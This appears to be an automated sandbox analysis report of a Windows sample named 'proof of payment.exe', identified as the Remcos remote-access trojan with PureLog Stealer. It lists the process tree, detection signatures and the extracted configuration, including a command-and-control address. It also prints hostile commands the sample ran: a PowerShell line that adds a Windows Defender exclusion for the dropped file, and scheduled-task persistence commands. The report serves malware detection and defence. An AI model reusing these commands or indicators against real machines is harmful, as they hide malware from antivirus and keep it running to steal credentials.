
Windows Analysis Report
proof of payment.exe

Overview

General Information

Sample name: proof of payment.exe
Analysis ID: 1435940
MD5: 931254205cd64ad16b18fc9b318e2ca6
SHA1: 4e5c18fcbf06212d952e084b1b455ecc136e4845
SHA256: 05a341a2577c728e8a994775b17b8c5562539146d78a5de948e3534e1ae1c629
Tags: exe

Detection

Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • proof of payment.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\proof of payment.exe" MD5: 931254205CD64AD16B18FC9B318E2CA6)
    • powershell.exe (PID: 5628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2372 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4020 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • proof of payment.exe (PID: 3640 cmdline: "C:\Users\user\Desktop\proof of payment.exe" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 4600 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 4860 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 4608 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 2564 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 5336 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx" MD5: 931254205CD64AD16B18FC9B318E2CA6)
      • proof of payment.exe (PID: 6044 cmdline: "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx" MD5: 931254205CD64AD16B18FC9B318E2CA6)
  • NvbYSEq.exe (PID: 4984 cmdline: C:\Users\user\AppData\Roaming\NvbYSEq.exe MD5: 931254205CD64AD16B18FC9B318E2CA6)
    • schtasks.exe (PID: 6896 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NvbYSEq.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Roaming\NvbYSEq.exe" MD5: 931254205CD64AD16B18FC9B318E2CA6)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Extracted configuration (Remcos):
{"Host:Port:Password": "37.120.235.122:2269:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F9KCYW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Yara matches (dropped files):
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Yara matches (memory dumps):
Source | Rule | Description | Author | Strings
00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown | 0x136a8:$a1: Remcos restarted by watchdog!; 0x13c20:$a3: %02i:%02i:%02i:%03i
(table truncated; 27 entries in the full report)

Yara matches (unpacked PEs):
Source | Rule | Description | Author | Strings
0.2.proof of payment.exe.5130000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.proof of payment.exe.5130000.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.proof of payment.exe.3917800.3.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0.2.proof of payment.exe.3917800.3.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0.2.proof of payment.exe.3917800.3.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown | 0x690a8:$a1: Remcos restarted by watchdog!; 0x69620:$a3: %02i:%02i:%02i:%03i
(table truncated; 39 entries in the full report)

                    System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", ProcessId: 5628, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NvbYSEq.exe, ParentImage: C:\Users\user\AppData\Roaming\NvbYSEq.exe, ParentProcessId: 4984, ParentProcessName: NvbYSEq.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp", ProcessId: 6896, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", ProcessId: 4020, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe", ProcessId: 5628, ProcessName: powershell.exe

                    Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proof of payment.exe", ParentImage: C:\Users\user\Desktop\proof of payment.exe, ParentProcessId: 2228, ParentProcessName: proof of payment.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp", ProcessId: 4020, ProcessName: schtasks.exe

                    Stealing of Sensitive Information

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\proof of payment.exe, ProcessId: 3640, TargetFilename: C:\ProgramData\remcos\logs.dat
                    No Snort rule has matched

                    AV Detection

Source: proof of payment.exe; Avira: detected
Source: http://geoplugin.net/json.gp; URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp/C; URL Reputation: Label: phishing
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Avira: detection malicious, Label: HEUR/AGEN.1306895
Source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": "37.120.235.122:2269:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F9KCYW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Virustotal: Detection: 55%
Source: proof of payment.exe; Virustotal: Detection: 55%
Source: proof of payment.exe; ReversingLabs: Detection: 60%
Source: Yara match; File source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Joe Sandbox ML: detected
Source: proof of payment.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00433837
Source: proof of payment.exe, 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_cc0481fc-1

                    Exploits

Source: Yara match; File source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR

                    Privilege Escalation

Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_004074FD _wcslen,CoGetObject,12_2_004074FD
Source: proof of payment.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: proof of payment.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\proof of payment.exe; Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_100010F1
Source: C:\Users\user\Desktop\proof of payment.exe; Code function: 7_2_10006580 FindFirstFileExA,7_2_10006580
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409253
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C291
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C34D
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_00409665
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0044E879 FindFirstFileExA,12_2_0044E879
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_0040880C
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0040783C FindFirstFileW,FindNextFileW,12_2_0040783C
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419AF5
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB30
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD37
Source: C:\Users\user\Desktop\proof of payment.exe; Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
Source: C:\Users\user\Desktop\proof of payment.exe; Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
Source: C:\Users\user\Desktop\proof of payment.exe; Code function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 12_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407C97
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe; Code function: 4x nop then jmp 06912264h 8_2_06912321

                    Networking

Source: Malware configuration extractor; URLs: 37.120.235.122
Source: global traffic; TCP traffic: 192.168.2.9:49708 -> 37.120.235.122:2269
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View; ASN Name: SECURE-DATA-ASRO SECURE-DATA-ASRO
Source: unknown; TCP traffic detected without corresponding DNS query: 37.120.235.122
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                    Source: global traffic | HTTP traffic detected:
                        GET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                    Source: proof of payment.exe, 0000000F.00000002.1696807471.00000000010BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: proof of payment.exe, 0000000F.00000002.1696807471.00000000010BD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
                    Source: proof of payment.exe, proof of payment.exe, 00000014.00000002.1689804255.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
                    Source: proof of payment.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: proof of payment.exe, 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                    Source: bhv58.tmp.15.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhv58.tmp.15.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: bhv58.tmp.15.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv58.tmp.15.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv58.tmp.15.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, NvbYSEq.exe | String found in binary or memory: http://geoplugin.net/json.gp
